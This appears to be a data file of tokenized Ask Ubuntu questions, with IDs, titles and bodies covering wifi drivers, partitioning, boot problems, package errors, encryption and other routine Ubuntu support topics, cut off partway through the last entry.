59285	any means to use ubuntu/linux to remove firmware restriction to boot from my passport essential 320g ?	purchased wd my passport essential thinking it was a full service drive ( i.e. , backup and bootable for system crash and recovery ) but not ! anybody know of work arounds ? firmware prevents from making the drive bootable . love is all there is ...
59291	replacement for dos xcopy command	in dos there 's the command xcopy /s *.mp3 ..\temp2 how can i do this in ubuntu ? cp -r *.mp3 ../temp2 will copy recursively all mp3 files , unfortunately without the path because of the *.mp3 filter . cp -r * . * ../temp2 will copy the path but can not be limited to mp3 files i had a look at rsync , but i do n't get it .
59296	how do i get wifi working on my hp pavilion dv2000 laptop ?	i have seen many questions regarding same issue but not able to get a solution . i 'm facing same issue that my wifi is not working in ubuntu 11.04 , but perfectly working fine with windows 7 . edit sahil @ sahil : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 05:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 08:08.0 ethernet controller : intel corporation pro/100 ve network connection ( rev 02 ) 08:09.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 08:09.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 08:09.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 08:09.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) sahil @ sahil : ~ $ lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 15d9:0a4c trust international b.v . bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0c45:62c0 microdia sonix usb 2.0 camera bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub sahil @ sahil : ~ $ sudo lshw -class network [ sudo ] password for sahil : *-network disabled description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 02 serial : 00:13:02 : c2 : ba:22 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=2.6.38-11-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:43 memory : d4000000-d4000fff *-network description : ethernet interface product : pro/100 ve network connection vendor : intel corporation physical id : 8 bus info : pci @ 0000:08:08.0 logical name : eth0 version : 02 serial : 00:16 : d3:09 : de:80 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full firmware=n/a ip=192.168.1.8 latency=66 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:20 memory : d4100000-d4100fff ioport:3000 ( size=64 )
59297	allow/deny a user from binding a range of ports	as it is , linux fails to bind ports < 1024 for any user other than root . how do you blacklist or whitelist ranges of ports for specific normal users , so that they can not bind them , in the same way a normal user ca n't bind port 80 ? there is a way to block traffic through these ports via iptables , but as this is a real multi-user environment , they really need to be impossible to bind .
59300	what package runs on what processor ?	packages i386 , ia64 , i636 , x86_64 , i486 , amd32 , amd64 , sparc , powerpc , arm , noarch ... am i missing anything ? processors intel - atom , i5 , i7 nvidia - tegra amd - 32 , 64 am i missing anything ? questions can someone help me match the package with the processor ? which processors are 64bit ? can i run 32bit packages on 64bit processors ?
59301	how do i remove a package with `` ru '' status ?	i was trying to install some 32bit libraries with dpkg -i -- force-architecture command . but it failed due to dependency problem . now if i try to install 64 bit version of the same library , it says it is already installed . if i try to remove it it says its not installed . dpkg-query -l shows that the status is ru for the package . i tried dpkg-configure -a , dpkg -- reconfigure , apt-get install -f , apt-get clean , apt-get autoclean and basically every possible google search . how can i get out of this stuck package installation ?
59303	ubuntu hibernation is not working properly in 11.04	when i do hibernate on ubuntu 11.04 , it does n't remembers the last known working state ; the last working state is completely lost after hibernate . how can i make sure hibernate works ! uname -a 2.6.38-11-generic # 48-ubuntu smp fri jul 29 19:05:14 utc 2011 i686 i686 i386 gnu/linux
59304	is there a graphical ssh-agent in 10.04 lts server ?	i have a co-worker who installed the gnome desktop on top of 10.04 lts server . his gnome session is running under ssh-agent , and if he runs ssh-add directly , it immediately prompts for his passphrase and adds the key . he has n't restarted the session , so i 'm not sure if ssh-add is required for every session . i 'm use to os x , where ssh key passphrases are stored in the keychain , so that you only need to remember your account password . is there a similar central password storage with a graphical interface for gnome ? is it standard on the desktop edition , or is it an additional install there as well ?
59309	how do i find my windows partition ?	i was windows user 5 hours ago , and i installed ubuntu on my laptop . in windows i created two partitions on my hard disk . in the first one i installed ubuntu 10.10 , but now i ca n't find the second one where i keep all my music , files and other documents . i mounted the partition using `` disk utility '' but still i ca n't find it in my home folder .
59310	how to use wi-fi channels above 11 ?	i 've seen multiple reports for this bug on ubuntu , yet no solution . in this case , the network is recognized but i ca n't connect . ( no , it 's not a router/driver issue . )
59317	are there any application lifecycle managment tool like mylyn or tasktop ?	are there any tool in ubuntu for connecting development , qa , and project management , something which provides synchronization solution for enterprise-scale application lifecycle management , for example : mylyn and tasktop ; some logical way to integrate web activity ( ie , emailing/time spend on researching on a topic ) and other system development activities and associating each part of activity with other relevant seed of thought . so that in end if we find one stream of thought we can track different activities related to it .
59328	dual-screen flash - does it work ?	flash 10.2 brought the ability to full-screen and not exit out of it when using another screen ( see this article ) . at least it did for windows . i 've never gotten dual-screen flash to work like this for me.. ever . clicking on my other monitor while a video is full-screened still exits out of full-screen mode . am i doing something wrong here ? i 've not seen any other posts on this issue , both on ask ubuntu and in the ubuntu forums.. i typically run chrome ; current setup is ubuntu 11.04 x64 . i use flash-aid for firefox to keep my flash up to date . any help to get this functionality to work would be much appreciated .
59330	setting system wide preferences in firefox	i am trying to figure out how to deploy a set of firefox defaults ( some changeable some not ) to a series of ubuntu desktops . the machines are running natty and firefox 6 . i would like to install this set of defaults as a .deb package ideally . i thought i would start small and set the default homepage using one of the config files but so far i ca n't get firefox to acknowledge any of my changes regardless of where i put them . my basic test has been this : pref ( 'browser.startup.page ' , `` http : //askubuntu.com '' ) ; and so far i have put that line in : /etc/firefox/syspref.js /usr/lib/firefox-6.0/defaults/pref/vendor.js ~/.mozilla/firefox/whatever.default/prefs.js ~/.mozilla/firefox/whatever.default/user.js /usr/share/xul-ext/ubufox/defaults/preferences/000system.js i quit firefox , make the change in the file and then log out and log in and start ff again . every one of these has been unsuccessful . keeping in mind that the default homepage is only the first of about a dozen settings i need to customize , how can i get firefox to use the settings i am adding ?
59335	why does my wifi randomly disconnect ?	happens sporadically , in 5-20 minute intervals ; as soon as i reconnect to my school 's network ( sometimes requires re-authentication ) , it works fine until the next failure . when plugged into ethernet , there are no connection problems . we use cisco clean access servers . the authentication takes place in the web browser and requires username and password . i do n't believe there is any authentication ( wpa , etc . ) on the connection itself . i have run updates , and have not experienced any problems like this on other wireless networks . i run ubuntu 11.04 . output of sudo lshw -class network : *-network description : ethernet interface product : 82566mm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 03 serial : 00:1f : e2:12:3c:8b capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.2.20-k2 firmware=0.3-0 latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : fe200000-fe21ffff memory : fe225000-fe225fff ioport:1840 ( size=32 ) *-network description : wireless interface product : ar5001 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 00:23:4d : dc:69:3e width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=2.6.38-11-generic firmware=n/a ip=149.175.158.37 latency=0 link=yes multicast=yes wireless=ieee 802.11bg resources : irq:17 memory : df2f0000-df2fffff
59347	is it possible to install ubuntu without a cd or usb drive ?	so basically as it stands i have a laptop which has no cd/dvd drive , and i do n't have a usb drive . the laptop has windows 7 installed with ubuntu 11.04 installed through wubi . what i want to do is remove windows completely , and make ubuntu the only os installed on the system . is there a way to do this without re-installing ubuntu ? ( i.e . can i take my wubi install away from windows ? ) or is there a way to from inside ubuntu have it run the ubuntu iso somehow so i can just wipe the system and install it fresh ? ( even if it means i need to have an e.g . 2gb partition just for the image to reside in ) .
59348	nautilus is frozen , can not be used , and can not be killed	i 'm experiencing the weirdest problem right now . nautilus is essentially not working right now . my desktop is frozen , clicking and right clicking does n't work , i ca n't open anything in nautilus , etc . it simply is broken . the problem is that i ca n't exactly kill it with anything . while true ; sudo killall -9 nautilus ; done does n't kill it . i ca n't log out because i 'm right in the middle of a long upload and i 'm not going to kill it if i can help it . is there something i can do to reload nautilus without logging out ?
59354	how can i record skype conversations ?	we are a small company and we have a help desk service to support our clients . we want to use skype to provide voice live support . this is the easy part . what we need also , is to be able to record some of the conversations for training purposes . what is the best way to implement such solution ? we have a low budget , so we are looking for something very cheap or even free . ideally we would like to have something running in the background on our ubuntu 10.10 desktops , and in someway detects the beginning of the conversation , starts the recording automatically , stops when the conversation is finished .
59355	premature termination of processes	i sometimes find that when i run a process that i know uses up a great deal of system resources , it terminates unexpectedly . is this because it becomes unresponsive , or is it because ubuntu ca n't cope with the demands ? is there a way to circumvent this , for example , by increasing the virtual memory ? if so , how ? note that i am running version 11.04 of ubuntu on a single pentium 4 processor with 4gb of ram . if it 's any help , my computer is a dell optiplex 210l .
59356	how do i get chinese input to work ?	how do i configure ubuntu to input chinese ?
59358	windows 7 and qemulator	due to some issues i 've had with virtualbox , i recently switched to using qemu , with the qemulator gui , and all has been well when playing with linux virtual machines . however , due to needs from my very-microsoft-married school , i need to install windows 7 , but i 'm having a problem . the win7 installer is only seeing the virtual drive as 1gb in size and refuses to install on it . i initially used the `` auto '' setting when creating the drive , but when that did n't work , i tried setting it explicitly to `` qcow2 '' after finding an old tutorial . that did n't work , either . is there a particular drive type that reports its size to windows correctly ? or , is there a way i can tell qemu to tell the vm that the size is different from its starting size ( since the default is a dynamically expanding format ) ? the vm drives are stored on a 1tb drive with 3/4 of its space unused , so i 'm not really concerned about drive space and a static-sized file could be used , if that 's what it takes .
59359	unable to boot into ubuntu after ubuntu-fedora dual boot	i tried to dual boot ubuntu and fedora , but now i am unable to boot into my ubuntu installation . here is the situation i had ubuntu installed already on /dev/sda2 and i resized it to create another partition /dev/sda3 . i installed fedora 15 on /dev/sda3 . now i can boot into fedora but there in to option to go into ubuntu . swap partition is on /dev/sda1 . swap /dev/sda1 ubuntu /dev/sda2 fedora /dev/sda3
59360	install unity 2d as default to save much needed resources	i think that i would prefer to use unity 2d . is there a way during a clean install to choose 2d instead of the 3d even though my hardware would support 3d ? my main applications that i use are for graphic design and photography and need all the resources i can when working with large files and/or large number of photos . from all the reading , 2d is lot less resource intensive , is this true ? i switched from the lts to xubuntu , but i really would like to learn this new ui .
59364	i accidentally removed myself from sudoers , how can i fix this ?	i have one admin account and recently i have accidentally added myself to a single group ( usermod -g without -a ) . so , i am not in the sudoers file any more . however , it is not possible to log in to root by default on ubuntu . do i reset the password for root during the boot process ?
59365	how can i synchronize my mp3 player creative zen ez300 with ubuntu 10.04 ?	how can i synchronize my mp3 player creative zen ez300 with ubuntu 10.04 ? ? i cant find software and i dont want to use it like an usb
59366	protecting against ( infinitely ) slow dns servers	recently , one of my isps dns servers got into trouble . to quote the support desk personnel it `` was n't completely down so connections were just infinitely slow '' . my application was down for a couple of hours , as it could n't connect to critical services on other machines . while i have redundant dns servers in my /etc/resolv.conf file , it appears that this slowness was n't enough for the dns client to declare the dns server is down , and to fallback to a secondary dns server . i fear this sort of problem could strike again , so i have been reading up on ubuntu dns configuration . there appears to be a timeout option with a default of 5 seconds , but that does n't seem to have worked here . q1 : is there a log file where i can see the dns attempts and confirm my understanding that the timeouts did n't trigger ? q2 : what do i need to do to implement such timeouts , and protect myself from such dns issues again ? for the record , my /etc/resolv.conf file ( expurgated ) : search localhost nameserver ip.addr.ess.1 nameserver ip.addr.ess.2 nameserver ip.addr.ess.3 i 'm running ubuntu 9.10 ( yeah , yeah , i hope to get a quiet period in december to upgrade . )
59369	ubuntu does n't see my partitions correctly	i bought a new desktop and installed windows 7 first . i am now trying to instal ubuntu 11.04 , but it does n't see my partions corectly . any thoughts are appreciated . thanks . here is the windows setup : what live cd partioner sees : what ubuntu live cd sees :
59370	command line autocomplete no longer escapes special characters on certain operations	when i 'm specifying arguments to the mv or cp commands at the command line and i hit tab to autocomplete the argument , it lists the argument without special characters escaped . for instance , it lists ajax-loader ( 1 ) .gif literally when it should list it as ajax-loader\ ( 1\ ) .gif autocompleted arguments to the cd command are listed correctly though . i do n't know what 's going on . i 'd appreciate any help / insight .
59372	grub loader and usb keyboard	my wireless usb keyboard is not recognised by grub loader , but i use to wait for 10 seconds and ubuntu was started since it is default in the boot menu . this morning , no 10 seconds countdown was performed and i was unable to boot , i just stuck in the grub menu . i took ps2 keyboard , connected it and booted . any idea how this happened ? some update ? now i want to configure grub to automatically , with no countdown , boot first menu option . part of my current /etc/default/grub : grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10
59375	tracker search for thunderbird mail ?	i see a lot of material about it , but mostly very much outdated regarding a tracker plugin for thunderbird . there definitely does not seem to be anything official . what is the best/recommended way , if there is any , to get tracker to search my thunderbird mail ?
59381	why encrypted $ home files showing to root , how to make it hidden again ?	my home directory is encrypted with ecryptfs . i booted and logged in straight into root . root see my home directory before i log in , but it should n't , and it was n't that transparent . however , when i check /home , the myusername/.ecryptfs folder is there normally , and so is the .private . so , it seems that encryption is there . note : no changed passwords between the dates , so that is n't it . it can be a coincidence , but i noticed that this happened after i used a common trick to dismiss the keyring asking for wifi password on login ( the one you change the default keyring and leave wifi password as clear text ) . my question is : how can i make it hidden to root again without changing my user password ?
59382	ensure swap encryption , add /var encryption , full hd encryption	i encrypted my swap with ecryptfs , but sometimes when i boot during the splash screen it says the swap is not encrypted , then it disappears . how can i check if it is encrypted ? only my $ home files are encrypted . what can be done about the information that leaks into system directories like /var/log ? to where does it leak ? how can i clean them systematically ? supposing the answer to number 2 is that it leaks a lot , is full hd encryption a better option to solve this ? if yes , what free program to use , since ecryptfs does not have this option ?
59383	extract part of a video with a one-line command	if i have a video , normally avi , but could be any , and i want to create another one in the same format but just a part , the position i seconds to f seconds into the video , what is the one-line command to do this ?
59384	advantages of mp3 to ogg	is there any advantage in converting all mp3 to ogg , besides ogg being an open format ? any disadvantages ? is all metadata kept during conversion ? edited , because of @ n.n . suggestion . here are the links to the separate questions : what is the maximum audio bitrate humans can distinguish ? reducing bitrate in conversion of mp3 and ogg
59386	where did the unity modal dialogs go ?	i 'm using oneric and i was rather impressed by the unity modal dialog addon . after a few upgrades it was gone . where did it go ? or is there any way of getting it back ?
59389	how can i extract text from images ?	how can i extract text from images ? i am not talking about scanned files , but garden variety images , such as when you take a high-def picture of a blackboard at class , and it is nicely handwritten ; or when you photograph a page from a recipe book and want the recipe in text format . any free and open software for that ? i tried tesseract , and the results were awful .
59390	how to install and activate nvidia drivers without jockey ?	short and precise : i would like to install and activate the most recent proprietary nvidia drivers from the repositories without using jockey . how can i do that ?
59391	what is the maximum audio bitrate humans can distinguish ?	some audio bitrates go as high as 256kbps . but i have listen to very very clear music with 92kbps . i became suspicious that beyond a certain bitrate of x kbps the average human ear can not tell the difference at all . what is x ? though the question is not ubuntu specific , it came up because of a ogg open-format question that i split . advantages of mp3 to ogg and maximum bitrate
59392	reducing bitrate in conversion of mp3 and ogg	i can save space by reducing bitrates of songs to x* , the value beyond which humans do n't discern any difference . if so , how to reduce the bitrates with cli : 1. mp3 to mp3 conversion 2. during mp3 to ogg conversion 3. ogg to ogg conversion of course , if the original bitrate is inferior than this `` x '' , i do n't want to artificially increase , i dare say . * reference to other question : what is the maximum audio bitrate humans can distinguish ?
59402	rotate a screen based on a config file	i have written a script called screen-rotate that will change the `` rotate '' section of the /etc/x11/xorg.conf . it will rotate either left or right based on a setting in a config file . i put this script in /etc/rc.local . when it boots up , the /etc/x11/xorg.conf was changed , but there is no rotation when x starts . i have tried a to put my script in a couple of places such as the following : /etc/gdm/init/default /etc/x11/xinit/xinitrc where should i put the script to make the rotation effective upon booting up ?
59404	how to control output from crontab ?	i am trying to run a test case via automation testing ( sahi ) , so i am running it repeatedly after 1 hour ( via crontab ) . what i want is that whenever my test case fails i should receive the email otherwise not . right now i am receiving mail whether it passes or fails . in short , can i send mail to a person depending upon the output i get in terminal . i am using ubuntu 10.10 .
59407	any good place to get started with ubuntu desktop widget development ?	any good place to get started with ubuntu desktop based widget development or any plugins based development ? i 'm looking for something similar to yahoo widgets . are there any sdk ( software development kit ) for gnome based desktop plugin development ?
59408	how to make secondary partition accessible to me ( and root ) only	i have workstation with 160gb hdd capacity . i have partitioned it with : 40gb -- for os ( ubuntu ) installation 40gb -- for my personal data , and 80gb -- for all other ( public ) data . i have installed ubuntu 11.04 on 1st partition . confusion : how can i make 2nd partition ( personal data ) visible and accessible to me ( and root , of course ) only . all other programs and files need to be accessed by all the users , but those 40gb must be accessible to me ( my account ) and root . how can i achieve this ( or some alternate ) ? note : if referring to any link , then make sure it 's easy to understand as i am very ( very ) new to ubuntu .
59409	laptop keyboard has gone crazy	my laptop keyboard has gone crazy . when i type something on it , it 's like i hammered the keys . example : hello myyyyyyyyyyyyyyyyyy name is gardar how are yoooooooooooooooooou ? this is more likely to happen when i type fast keyboard but also happens when i type real slowly . ubuntu 10.04 is my main os along with ose virtualbox win xp this ca n't get anymore annoying and it 's taking me about forever to post this message .
59411	adding a starter for gnome-control-center in docky	i want to add a starter for the gnome-control-center in docky ( this is possible in linux mint by default . the gnome-control-center behaves like an app . ) however , i 'm using ubuntu 10.04.3 & docky v2.2.0 . i can only open the gnome-control-center via terminal . is there a gui i can install ? i have not found anything using synaptics and software center .
59416	can not install maverick meerkat	i have a low-end pc am tired of windows so i tried to install ubuntu 10.10 maverick meerkat on my system . i really do n't know what 's wrong . after i booted my system with the livecd that i got from shipit , my system froze and after almost 5 minues , its default wallpaper comes an error comes right on the face ! an unexpected error has occured . ubuntu will now boot in live mode so that you can re-install again . ( i dont remember the word-to-word sentence ) and when i try again , it repeats the same old thing . my cd and dvd burner is fine ( i checked on a friend 's pc who wanted to try ubuntu . ) these are my specs : 2.4ghz p4 , 256mb ddr1 , msi 82865 intel chipset , 250gb sata ( free space : 18+8+10+8+22 ) p.s : i even tried to install it from a flash but its the same prob again n again .
59419	how to use grep in a conditional search previous to a sed text replace command	i am trying to change the path in whole lot of m3u files . i know i can do it with regexxer f.e . but i 'm trying to learn bash . this is the command i figured out , but it is not working . grep -lr -i -e 'm : \\ ' * | xargs -0 sed -i 's/m : \\/t : \\/g' i suspect , but only suspect , it is due to special characters in filenames . how to deal with that ?
59420	some characters `` hidden '' by half	i just upgraded my ubuntu to 11.04 ( natty ) and suddenly some characters are rendered only by half . to illustrate it better , i 've uploaded a screenshot here : i found this bug report , which reflects exactly my symptoms with the intel video chipset my x41t has built-in : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/745608 did someone else experience this problem yet or does somebody know what could cause the issue ?
59425	how do i choose the right parameters when using badblocks ?	i 'd like to use badblocks to check my new drive for bad blocks , but i 'm not sure how to choose the values for block size and number of blocks to test in parallel . the man page just says : -b block-size specify the size of blocks in bytes . the default is 1024 . -c number of blocks is the number of blocks which are tested at a time . the default is 64 . the drive to test is 2tb large , so i 'd like to use values that do n't make this process take days . : - ) fwiw , smartmoontools reports : sector sizes : 512 bytes logical , 4096 bytes physical
59426	black screen when booting whereas failsafe mode works	i 've had a problem for quite some time now . when i boot up my ubuntu 11.04 it just wo n't load x . it works when i first load in failsafe mode and then restart x , however this is a quite annoying procedure to go through every time i start my computer . what i 've found in my xorg.1.log that looks suspicious is this : using config file : `` /etc/x11/ '' in the xorg.failsafe.log it says using config file : `` /etc/x11/xorg.conf.failsafe '' which to me makes more sense . here is my xorg.1.log http : //pastebin.com/aff50sji and here is the xorg.conf file found in /etc/x11/xorg.conf http : //pastebin.com/gy2ankwd everything works fine after failsafe start and x restart , but the computer just wo n't start in a normal way .
59431	system boots in fallback mode half of the time	half of the time when i boot up my laptop it enters gnome classic fallback mode and all 3d graphics are disabled . if i log out and log back in , then it will enter unity properly and 3d effects will be returned to normal . some notes : this seems to occur slightly more often on a cold boot , but can still occur on a restart , or warm boot . i have n't been able to find a pattern yet . setting ubuntu to show me the log in screen instead of automatically logging in does not solve the problem . blacklisting nouveau does not fix the problem . at first i thought that my proprietary nvidia graphics driver is not being loaded fast enough , so it defaults to nouveau for the first log in , however this is not the case . my computer is still using the nvidia driver even in low graphics mode . i 'm using a macbook 5,1 revision with a integrated nvidia geforce 9400m chip with 256mb of shared memory . i have n't been able to find any console messages , but i will update with them if i find any ( i 'll admit i do n't fully know where to look ... ) any help is greatly appreciated .
59432	how to copy line in a file and paste it into a new file ?	i have a file containing my personal details ( .txt ) . how can i via the terminal copy only a few lines in the file and bring it to a new .txt file ? ok , for eg , this is my details . name : farah age : 23 phone number : 0123 education : degree how can i copy only age and phone number and bring those to a new.txt ?
59434	failure of power supply during remote desktop connection makes the local machine unusable ?	with sudden failure of power supply in the remote machine makes the local machine desktop to a complete dead state , meaning i 'm not able to kill the current remote desktop connection that was established from local machine . i believe the connection is no more , but the fullscreen mode prevents me to do any other task . i used this command : rdesktop -u username -p password -f -f forces it to render in fullscreen mode is there any way to invoke gui taskbar ( something which shows the current running processes ) if exist in ubuntu with some combination of keyword . i used ctrl+alt+t to invoke terminal , but it did n't worked .
59439	ubuntu software center error : failed to lock the package manager	ever since i installed ubuntu 10.10 i 've been getting this error when trying to install anything via software center and have only been able to install software via synaptic and apt-get . i 'm sure neither synaptic or aptitude are running . what is this ?
59443	how can i revert back from an upgrade to the proposed repository ?	i mistakenly enabled the pre-release updates ( natty-proposed ) repository and then upgraded all packages . how can i undo this ? here are the test results from @ enzotib 's instructions and the test results from my instructions .
59444	how can i report a bug about apport-gpu-error-intel.py crashing ?	everytime my gpu crash and i have to reboot , after the boot appears : the window to report the gpu crash bug when i try to report it , apport-gpu-error-intel.py crashes another window appears suggesting me to report the crash of apport-gpu-error-intel.py then i try to report it , but when launchpad is opened i see that is reporting the original gpu bug and there is no more trace about apport-gpu-error-intel.py crash . so , how can i report it ? update : i know that i can report it manually , but how can i give more information , like a backtrace or something similar ?
59446	what 's the preferred method for connecting to a pptp vpn under kde ?	i have a remote worker who 's got a ubuntu 10.04.3 machine , running kde . she was using kvpnc until she did an update over the weekend ( i do n't have the details on the update , she may have been using an older version of ubuntu ) . now kvpnc does n't work - i 've checked logs on our end and it is n't connecting to our vpn server . i 've asked her to try network-manager 's vpn manager ( network-manager-pptp-kde ) and while she 's got it installed and configured , she ca n't find a way to instantiate a connection . i do n't have a kde machine here to replicate the issue . is network-manager the right method to use for this ? how do you actually start a connection ? thanks !
59448	how to add the ncurses.h to a c++ program compiled on gcc ?	i am totally new to c++ programming on gcc . i wanted to add color to my text on the output on the console . since there is no conio.h on linux , i researched and found that ncurses.h could do the trick . now the only problem is that i do not know how to download it and then add the library . can someone please describe the method ? also , if anybody can describe whether ncurses.h is a better option than curses.h or if i am completely wrong in using curses.h ?
59449	what is the `` other '' account in lightdm ?	i use ubuntu oneiric and i would like to know what is the account named other for ? it does not appear in the user manager . how can i remove it ?
59450	how do i turn off notifyosd display of music information ? it distracts me from my work	while writing reports for school ( using writer or impress ) , i often play a playlist of instrumental music in the background . it is distracting to have the notifyosd pop up every time the song changes . notifyosd pops up to show the artist , song , etc . it distracts me from my work . i 'd like for the playlist to play without notifyosd . i prefer to use the exaile music player . can this be natively configured ? how do i do it ?
59454	went down for restart , wo n't come back up	i installed updates , gnome3 , xampp , netbeans and a set of drivers . i went to restart the machine , and when coming back on , it hangs on a purple screen trying to turn back on . when i try to tap escape in order to get into the `` safe '' mode , it still hangs on the purple screen then eventually displays ^ [ ^ [ ^ [ ^ [ on the screen . it does n't respond to keystrokes after that , but it does respond to the power button - it shuts back down gracefully , with the ubuntu logo . i booted into the cd and just ran it from there , so i 'm thinking i can try and fix whatever damage is done and try to boot back from the hard drive . any ideas on what went wrong and how to fix it ?
59458	error message when i run sudo : unable to resolve host ( none )	i have this issue on aws on some servers . whenever i run sudo the terminal is stuck doing seemingly nothing , until it finally spits out this error message . my terminal looks like this : ubuntu @ ( none ) : ~ $ sudo true sudo : unable to resolve host ( none ) what can i do to solve it ?
59459	how do i enable account lockout using pam_tally ?	i am trying to implement account lockout in ubuntu using pam_tally . i have tried adding the follwing lines in /etc/pam.d/common-auth auth required pam_tally.so deny=3 account required pam_tally.so the failures are getting logged but account is not getting locked even on reaching max failures . i am trying this by directly loggging in ( gnome login screen ) . any advices ? do i need to add in pam.d/gdm or login file also ?
59468	way to turn on wan antenna ( mobile broadband ) while leaving lan antenna ( wifi ) off ?	my laptop has integrated mobile broadband so it can get internet from cell phone waves when i 'm away from home . it also has wifi so it can get internet by connecting to my wireless router when i 'm at home . i have a lenovo laptop and when i first got it it had windows installed . using windows i was able to selectively turn on/off the `` wifi '' antenna and/or the `` mobile broadband '' antenna . i could have both on , both off , or one on and one off . using my laptop 's fn keyboard shortcut to activate the antennas in ubuntu appears to be an all on or all off action . battery life when using ubuntu is not the greatest . so i was thinking it might be helpful to make sure that unnecessary antennas are not on when they do n't need to be . so when i am away from home and using mobile broadband is there a way i can disable the wifi antenna , and vice versa for when i am at home ?
59474	css editor with real-time preview and selector localization	the title says everything about what i 'm looking for . basically it should be an software that collects all styles of a website so i can edit them and save them . please read the question carefully , because i want all mentioned conditions to be met . edit : i want to be more clear here or rather describe my desired workflow . starting situation will be that you have the sources of the website on your local machine . now i want to open the plain sources ( html/css ) in my editor/ide/whatever ( no wysiwyg ! ) . and i want a live preview right next to it or in different window ( not in another tab ! ) , i want to see it as i edit the source . the preview should be updated automatically ( or when i save the file which essentially would be the same because ctrl+s is kind of a reflex : p ) . additionally it should have an inspector that works like those in firebug or chrom ( e|ium ) . when i click on a css selector in that inspector , the cursor should jump right to it in the respective source file . another edit : found this http : //stackoverflow.com/q/4680109/220652 . almost the same problem .
59475	how do i automount a fake raid ?	hardware asus k8n4-e deluxe mobo sil 3114 fake raid , onboard 2 seagate 250 gb hd , hosting my /home a backup on a separate hard disk of /home what i have so far i 've made the raid using the sil 3114 firmware . i 'm using raid level 1 . i have a bash script i run as root as soon as i get a prompt : dmraid -ay mount /dev/mapper/sil*1 /home the problem i have to logon as root and use that stupid bash script every boot . ubuntu is n't automatically understanding the raid volume . i have n't put the raid volume in fstab because it does n't exist on boot . how do i have /home from my fakeraid automounted at boot ?
59477	apt-get install python-software-properties dependency problems	so , i was trying to add a repository using add-apt-repository and i got this error : sudo add-apt-repository ppa : gijzelaar/opencv2 [ sudo ] password for foo : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 8 , in < module > from softwareproperties.softwareproperties import softwareproperties importerror : no module named softwareproperties.softwareproperties like a n00b , i thought it would be a good idea to simply uninstall and reinstall python-software-properties using apt . upon reinstall , i got this : foo @ ubuntu : / $ sudo apt-get install python-software-properties reading package lists ... done building dependency tree reading state information ... done python-software-properties is already the newest version . the following packages were automatically installed and are no longer required : libswscale0 linux-headers-2.6.38-8-generic libtorque2 libavutil50 libvtk5.4-qt3 fsl-mni-structural-atlas fsl-bangor-cerebellar-atlas fsl-atlases linux-headers-2.6.38-8 libnewmat10ldbl fsl-talairach-daemon-atlas fsl-harvard-oxford-atlases libgl2ps0 libcvaux2.1 libgdchart-gd2-noxpm qt3-assistant liblapack3gf fsl-doc-4.1 fsl-oxford-thalamic-connectivity-atlas libmysqlclient16 libavcodec52 fslview-doc tcsh libhighgui2.1 libvtk5.4 libopenmpi1.3 